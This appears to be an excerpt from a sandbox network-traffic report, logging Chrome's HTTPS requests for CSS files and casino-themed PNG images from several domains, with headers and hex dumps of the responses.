                                                                                                                                                          2024-06-09 22:41:24 UTC16384INData Raw: 0e 87 05 a3 27 4f 41 d5 5f 9e 46 45 c5 6e 84 43 31 a4 4d 9b 88 cc bc 1c 68 a1 24 ff 0b c4 c2 30 f0 82 ee ce df 5b b5 4f cf b7 f5 a6 a5 21 42 f3 2b 10 f0 c3 1f 8d e0 b3 85 ef 62 df 9e 6d b0 91 39 ee 12 ed 48 37 9a 10 6c a8 d2 f3 cc 22 4f bd 08 e5 83 85 00 81 85 8d ea f9 a7 9c 0c 8d 80 e2 b1 1b f0 cb bb ee c2 e4 63 8f c3 f8 f1 e3 10 57 69 3c 8c 69 a8 2b df 8c e1 a3 a6 9e 54 59 51 51 3f 70 e8 d0 86 5e bd a2 c6 25 66 ed 28 9c 90 20 8b 8d 38 67 c4 c0 91 c9 ac 31 07 00 f7 8d b9 bd 2e 1d 84 c4 3f 62 04 88 33 ae bf 68 90 8f b7 0d 48 98 04 de 40 ff 67 0b 3b 5a 6a 56 f2 1b 19 58 b8 af bd 3a 2f f5 82 2c 4e 0e 91 f6 f1 90 ac 49 43 20 6e 16 1b 6b f6 c6 93 2f bf 50 52 6f 2e d5 f4 17 5e 0b 8a 0f 1f 3f fb eb ad 4b 1e b9 f9 a3 68 dd a6 cf 0c 1a 56 fb 7a d8 3b ea 8c 7d af
                                                                                                                                                          Data Ascii: 'OA_FEnC1Mh$0[O!B+bm9H7l"OcWi<i+TYQQ?p^%f( 8g1.?b3hH@g;ZjVX:/,NIC nk/PRo.^?KhVz;}
                                                                                                                                                          2024-06-09 22:41:24 UTC5182INData Raw: 05 c0 62 b1 b0 60 99 de 86 21 b0 7f 15 45 e9 cd 68 9c fd ab 53 d0 7b 71 b0 f9 41 06 a3 c0 b0 20 b5 33 52 6f 34 8f ee b4 82 58 49 46 77 3c 43 42 93 d0 71 09 e5 a5 62 d4 a7 84 82 43 55 71 b2 22 81 d9 62 84 92 92 7c e8 8c 49 09 63 41 3f c2 23 14 86 5f 88 d7 a3 df 2e 7b 77 f5 8e 55 1f 64 06 0f 1b 02 83 d0 db ea b9 1e 7d b3 95 6b 70 9f 3e 79 83 63 86 65 46 f1 aa ee b4 14 dd 54 90 ab d5 d1 6b d5 fa 67 ef e1 b4 e6 35 b5 93 4a 39 f8 05 6f ff de 9b 73 22 2c 5d a2 57 f5 dd f1 76 7c 4a 4a 2c 3c 05 37 a1 0b e2 1d 2f ff 6d 86 f5 90 e8 4e 6d df ac 84 fb 76 d8 2a 13 d6 92 81 7f 1b da fa a9 dd ee 80 f3 57 3a a7 88 19 53 e7 fb 17 89 db 8f 7d be d9 6a 33 24 8d ff ba 7e 42 48 33 d9 40 33 64 a9 b9 08 c0 a6 25 f0 fa d3 bc db 04 67 1a a2 a9 ab e7 bf b3 e8 f0 c7 e6 ce 35 6c f6
                                                                                                                                                          Data Ascii: b`!EhS{qA 3Ro4XIFw<CBqbCUq"b|IcA?#_.{wUd}kp>yceFTkg5J9os",]Wv|JJ,<7/mNmv*W:S}j3$~BH3@3d%g5l


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          702192.168.2.550479183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:24 UTC588OUTGET /061410/rcenter/msites/themes/default/common.css?v=1717580749344 HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:24 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 434
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-04-18
                                                                                                                                                          ETag: "655579ca-1b2"
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Last-Modified: Thu, 16 Nov 2023 02:09:14 GMT
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:41:24 GMT
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;xymp04:80;
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-XY-MP-04-18
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-07
                                                                                                                                                          X-Cdn-Request-ID: da2365fe596ca6405d3b8bc47bb42c00
                                                                                                                                                          2024-06-09 22:41:24 UTC434INData Raw: 40 69 6d 70 6f 72 74 20 22 2e 2e 2f 62 61 73 65 2e 63 73 73 22 3b 40 69 6d 70 6f 72 74 20 22 2e 2e 2f 2e 2e 2f 2e 2e 2f 63 6f 6d 6d 6f 6e 2f 74 68 65 6d 65 73 2f 62 61 73 65 2e 63 73 73 22 3b 40 69 6d 70 6f 72 74 20 22 2e 2e 2f 2e 2e 2f 2e 2e 2f 63 6f 6d 6d 6f 6e 2f 74 68 65 6d 65 73 2f 64 65 66 61 75 6c 74 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 3b 40 69 6d 70 6f 72 74 20 22 2e 2e 2f 2e 2e 2f 2e 2e 2f 63 6f 6d 6d 6f 6e 2f 74 68 65 6d 65 73 2f 64 65 66 61 75 6c 74 2f 62 6f 6f 74 73 74 72 61 70 2d 64 69 61 6c 6f 67 2f 62 6f 6f 74 73 74 72 61 70 2d 64 69 61 6c 6f 67 2e 63 73 73 22 3b 40 69 6d 70 6f 72 74 20 22 2e 2e 2f 2e 2e 2f 2e 2e 2f 63 6f 6d 6d 6f 6e 2f 74 68 65 6d 65 73 2f 64 65 66 61 75 6c 74 2f 66 6f 6e 74 2d 61 77
                                                                                                                                                          Data Ascii: @import "../base.css";@import "../../../common/themes/base.css";@import "../../../common/themes/default/bootstrap/bootstrap.css";@import "../../../common/themes/default/bootstrap-dialog/bootstrap-dialog.css";@import "../../../common/themes/default/font-aw


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          703192.168.2.550480183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:24 UTC592OUTGET /061410/rcenter/msites/themes/default/lang/zh_CN.css?v=1717580749344 HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:24 UTC619INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-YANC-MP-116-17
                                                                                                                                                          ETag: "655579ca-0"
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Last-Modified: Thu, 16 Nov 2023 02:09:14 GMT
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:41:24 GMT
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;yancmp116:80;
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-YANC-MP-116-17
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-29
                                                                                                                                                          X-Cdn-Request-ID: 8722bc4c5714f107abfe5a4d1f8e29fb


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          704192.168.2.550482183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:24 UTC589OUTGET /061410/rcenter/common/themes/default/bootstrap/bootstrap.min.css HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:24 UTC650INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-24-10
                                                                                                                                                          ETag: W/"633d510e-1ca78"
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Last-Modified: Wed, 05 Oct 2022 09:40:30 GMT
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:41:24 GMT
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;xymp24:80;
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-XY-MP-24-10
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-04
                                                                                                                                                          X-Cdn-Request-ID: ead6f942414e039966a1540dcf59385c
                                                                                                                                                          2024-06-09 22:41:24 UTC15734INData Raw: 38 38 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 93 e3 38 8e e0 5f f1 54 47 47 57 4d d9 2e 59 7e a5 33 a3 f3 66 63 37 62 77 3f cc 7e b9 fd 70 11 dd 7d 17 b2 24 a7 35 2d 5b 1e 49 ae 47 3b 7c bf fd f8 26 08 82 92 ec cc 9e 99 8b 98 ad bb e9 34 09 82 20 00 12 20 44 82 fb f6 50 5e 76 d5 b1 9d ec 92 43 51 7e 7b 6c 92 63 33 69 f2 ba d8 3d 4d be e4 db 5f 8b 76 d2 e6 5f db 49 53 fc 96 4f 92 ec 2f e7 a6 7d 9c 45 d1 f7 4f 93 43 43 d7 5c b7 55 f6 ed 72 48 ea 97 e2 f8 18 5d 93 ba 2d d2 32 1f 27 4d 91 e5 e3 2c 6f 93 a2 6c c6 bb e2 25 4d 4e 6d 51 1d f9 9f e7 3a 1f ef aa aa cd eb f1 3e 4f 32 fe 9f 97 ba 3a 9f c6 87 a4 38 8e 0f f9 f1 3c 3e 26 9f c7 4d 9e 8a 16 cd f9 c0 d0 7f bb 64 45 73 2a 93 6f 8f db b2 4a 7f bd 26 e7 ac a8 c6 69 72 fc 9c 34 e3 53 5d bd d4 79 d3 8c
                                                                                                                                                          Data Ascii: 884}k8_TGGWM.Y~3fc7bw?~p}$5-[IG;|&4 DP^vCQ~{lc3i=M_v_ISO/}EOCC\UrH]-2'M,ol%MNmQ:>O2:8<>&MdEs*oJ&ir4S]y
                                                                                                                                                          2024-06-09 22:41:24 UTC3974INData Raw: c2 e3 49 76 71 9a 86 bb 09 4b cc 05 e8 23 e7 06 b9 69 5a 1d b9 29 7e 7a e8 6f fa a0 4e 0c 93 6a 1f 04 bb 5f 68 b2 7d 90 49 aa da 61 4e 70 2c fc 1c 00 29 32 89 25 2c 31 a7 be 87 96 1b e4 a5 09 75 e4 a5 38 19 64 58 df 06 14 b7 83 89 cf cc 5e ca 3d 26 36 e7 27 f1 8f 5e ea c5 38 1a be 43 04 f1 8b 61 1f e9 e5 47 f7 19 fa e8 1e b9 1f b0 83 40 8a 60 19 0f 80 87 ad 74 85 e6 96 bf 0b 76 f6 89 dd 23 e8 b8 dc 42 dd 3e 41 7d 93 2f ba a8 e4 0a ae d6 ab 76 6d d1 96 79 97 7c 23 78 c8 60 e5 9f 7e 02 68 e4 55 0a fb 53 39 81 b0 68 4a 94 89 22 dc 76 aa 4a 69 aa 77 55 d5 82 cc c2 80 d1 81 fd 2c 60 61 f7 b3 5e 3d b7 7b 88 8b 45 8c 9e 67 30 01 c6 ba 48 52 9a aa 44 10 10 c4 3f fe e6 61 f1 d6 ae 01 68 bd 36 3a 40 02 b2 ba a3 79 42 75 0d 43 2c 1e 4a f7 25 d6 5e 92 06 e3 02 b1 9c
                                                                                                                                                          Data Ascii: IvqK#iZ)~zoNj_h}IaNp,)2%,1u8dX^=&6'^8CaG@`tv#B>A}/vmy|#x`~hUS9hJ"vJiwU,`a^={Eg0HRD?ah6:@yBuC,J%^


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          705192.168.2.55048890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:24 UTC609OUTGET /pc/image-pc/index/312/nav/card/ky_img.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:24 UTC627INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 37013
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Sun, 02 Feb 2020 09:52:24 GMT
                                                                                                                                                          ETag: "5e369bd8-9095"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[4],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,3],EU-GER-frankfurt-GLOBAL1-CACHE8[22],EU-GER-frankfurt-GLOBAL1-CACHE1[0,TCP_HIT,21],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465098
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 0a5703c3dea57f09f55246dcaa05808d
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 13151359
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:24 UTC15757INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8b 00 00 00 8b 08 06 00 00 00 51 19 6a ff 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDRQjtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01
                                                                                                                                                          2024-06-09 22:41:24 UTC16384INData Raw: 68 29 83 4a 93 a1 d4 84 11 65 04 ab b3 17 7b c6 9c 05 93 8f 18 b3 2c 6d aa 8b 53 15 bb e4 8c d7 ef 3d f8 fa 35 75 bc 1a fe f6 05 9d c4 ed 83 d7 de 38 4b 88 47 f5 2c 9a b4 34 68 d8 e5 b5 25 39 28 04 10 ac 56 db 6c d1 eb a8 d9 ac a7 dd 00 d4 44 b1 3f 72 96 70 00 5c e9 b9 30 6e fa 74 28 79 ef 25 d0 29 22 38 5d 6e 2a 99 cc 16 33 04 83 41 28 d9 ba 15 ea ab aa 21 35 c9 01 32 02 aa 11 b5 6b 34 63 08 5c 75 ed 2d 10 0f 7a a1 15 d5 c8 91 83 7b 68 4e af c3 93 01 46 e4 3b a4 71 62 d0 d7 82 9c 40 02 47 4a 2f 48 f5 64 43 4a ae 65 9b d5 a1 8f bc f1 8f 37 3e b8 ef a1 3f cd 79 e1 95 17 61 fe 8d b7 c0 9d b7 dd 0d f3 e7 cf 87 d9 97 cf a4 7b 66 7a 26 82 d4 0f ef be fd 0e 4c 9f 71 09 64 e6 67 40 d5 b6 07 95 bf d6 3e 8f 94 32 c4 d6 34 0a 70 f7 63 e2 a8 50 ab b8 4e 67 d4 c5 7e
                                                                                                                                                          Data Ascii: h)Je{,mS=5u8KG,4h%9(VlD?rp\0nt(y%)"8]n*3A(!52k4c\u-z{hNF;qb@GJ/HdCJe7>?ya{fz&Lqdg@>24pcPNg~
                                                                                                                                                          2024-06-09 22:41:24 UTC4872INData Raw: fc b7 b0 d6 a1 7e 24 ea 2e 70 a0 80 71 d6 99 9c 06 b3 ba 8e cb 0c 04 b3 e8 2a 4f 26 45 37 47 02 eb ec 0e 73 67 02 0a 09 02 e9 7c 65 65 d9 fb 8d 8d 35 4b 16 2c 9a 57 b5 6d db 8e 1b 57 be ff 61 c2 8d 5e 5a c0 5f 44 6e 32 9a 33 3b bc dd 26 7b ef 7e a7 cf fd c4 43 37 eb 19 d1 d9 99 b6 05 8e ec ee 1c 84 1b 0e f3 ee 2a 12 32 ea d2 d6 a6 d1 59 35 04 e5 6d ef 0d 8c 8f 6e 57 a9 b9 5f 10 fe f5 82 f2 8f 0b cb 08 d2 ba 5f 9c e6 5a 76 e7 49 89 ab f2 c9 d6 87 b2 56 fb 49 57 3d 17 29 fb 42 96 8c 9b 7a 92 03 03 7b 56 bc 4b 35 a9 7b c7 5f 55 a3 41 ad 5d 5e fb ab 1d 04 40 fd 9e f2 45 92 a5 ce d9 b4 7a 03 1c 79 f4 99 c2 b1 5f 3f 47 48 c4 d2 5c d2 98 cb e4 c1 ed f6 69 3e bf ff d9 92 b2 e2 45 81 12 6f a9 d7 eb bc 4a 94 84 8f 10 2c 0f 9e 7d d1 85 cf d3 02 d7 54 54 04 35 20 12
                                                                                                                                                          Data Ascii: ~$.pq*O&E7Gsg|ee5K,WmWa^Z_Dn23;&{~C7*2Y5mnW__ZvIVIW=)Bz{VK5{_UA]^@Ezy_?GH\i>EoJ,}TT5


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          706192.168.2.55048990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:24 UTC379OUTGET /pc/image-pc/index/312/nav/casino/05.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:24 UTC629INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 40880
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:46 GMT
                                                                                                                                                          ETag: "5d71fe7e-9fb0"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[2],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE10[284],EU-GER-frankfurt-GLOBAL1-CACHE3[0,TCP_HIT,282],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465101
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 6b30ee24ff2c92b25e6b48338981fab8
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 7105854
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:24 UTC15755INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8b 00 00 00 8b 08 06 00 00 00 51 19 6a ff 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 80 00 49 44 41 54 78 da ec fd 75 9c 25 d7 79 e7 01 7f cf 29 bc d8 0c d3 c3 a4 01 0d 89 46 cc b2 2d b0 9d 98 51 66 86 38 d9 6c 38 9b 8d 37 d9 4d 36 9b 64 93 d8 8e 19 63 3b a6 98 49 92 45 23 e6 99 d1 30 f7 34 f3 ed 4b 85 e7 9c f7 8f ba dd 33 92 1d c7 8a 77 d7 fb be fb 1e 7d 6a 3e d3 9a be 75 4f 55 3d f5 e0 ef f9 3d 82 ff a7 97 c4 16 36 a9 b7 9c 8b 5e f7 17 bd cd ee cd fb e7 bc 7c 37 46 d1 53 ad d4 fa d5 f0 96 db fe f1 dd a7
                                                                                                                                                          Data Ascii: PNGIHDRQjgAMAa cHRMz&u0`:pQ<bKGDCIDATxu%y)F-Qf8l87M6dc;IE#04K3w}j>uOU==6^|7FS
                                                                                                                                                          2024-06-09 22:41:24 UTC16384INData Raw: 4b 97 86 65 9b ce 95 71 ae b8 b9 bc ba ab 7b fb b9 57 36 66 d3 dc 58 3a 3b 78 74 ec 9f 7e 3f cc 28 d3 21 8d b3 fa 91 e3 5a 5b e3 d4 20 ff 17 b0 3e 0b 73 36 84 41 a3 74 2a fd 9c ec 9a 99 18 b5 6b b3 b3 14 7a 97 a0 f4 1c 95 ea 3c 61 12 32 57 ad 70 f4 c4 51 72 5e 27 39 bf 0d 49 1d 25 43 f2 b6 60 55 ff 12 ae dc b9 13 79 c1 45 9c 38 3e cc be 7d fb 38 3d 79 82 43 8f 1f a3 bf 94 a7 a3 a3 8f 20 9c 27 9a 3c c9 8e a5 79 2e 5c bd 83 66 bd 8a 8a 12 8a 6e 07 4b 3a 97 b3 ef c9 c3 9c 3a 3a c8 b2 fe 6e 36 6d da c2 65 db b7 61 5b 2e 07 4f 8e d1 a8 34 19 1c 9f c4 71 7d f2 ae 85 e3 6a 46 06 8f 31 5b 9b 47 6b 9b 20 d1 68 a3 e9 ef 69 a7 1a c6 9c 1e 99 a2 6b be da 9e ef f1 5d 4b c8 33 c8 ea 5f 62 d9 76 f6 cc 1c c7 d9 0a 29 b8 11 88 84 15 2f 7c bb db be ec a2 f5 4e 9a 0c d8 6a
                                                                                                                                                          Data Ascii: Keq{W6fX:;xt~?(!Z[ >s6At*kz<a2WpQr^'9I%C`UyE8>}8=yC '<y.\fnK:::n6mea[.O4q}jF1[Gk hik]K3_bv)/|Nj
                                                                                                                                                          2024-06-09 22:41:24 UTC8741INData Raw: f8 7e 81 52 a9 8d 6a a5 83 62 a9 0d c7 cb e1 39 3e ae a3 c8 65 f0 d1 28 69 d0 0c a7 19 9f 18 66 c7 ce ad ac 5f b7 9e bd 7b 47 11 69 8e b0 e6 30 b0 6b 8a ae f6 05 f4 cd 59 02 c2 a1 11 36 08 c2 3a ed 79 85 3b 31 42 47 21 47 6c 24 ed 8b 17 d3 7b d2 f1 d0 d1 0e 5e 91 e7 37 ee 64 e3 96 a1 ab 3f f8 b9 af 7f b2 01 c4 0e 18 47 82 2e 8a 63 ff fc ea c3 83 39 07 4c 6e fd d9 57 a6 07 d6 dd f5 c2 dc e3 5e b3 74 e9 71 c7 f5 6c 7f f0 8e 3d 30 cc f6 47 ef d9 b3 64 79 ff 5e 4f e5 17 be b0 79 70 90 86 63 10 6d a0 cb 50 e8 b0 b1 6a 76 52 48 a9 10 3a b5 26 62 5c 1b e3 88 d9 e2 8b 9a cd a5 5a 56 a3 41 07 8c ee dc a8 11 0d 30 31 b3 40 d0 97 70 59 92 ec 01 ed 11 d5 7d d0 aa d1 27 6e fe d9 66 1a 35 73 c2 45 57 74 38 e5 f9 67 44 b1 de 3d bc f6 81 11 4c 04 32 a1 25 28 41 a6 d3 fc
                                                                                                                                                          Data Ascii: ~Rjb9>e(if_{Gi0kY6:y;1BG!Gl${^7d?G.c9LnW^tql=0Gdy^OypcmPjvRH:&b\ZVA01@pY}'nf5sEWt8gD=L2%(A


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          707192.168.2.55049390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:24 UTC605OUTGET /pc/image-pc/index/312/nav/card/03.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
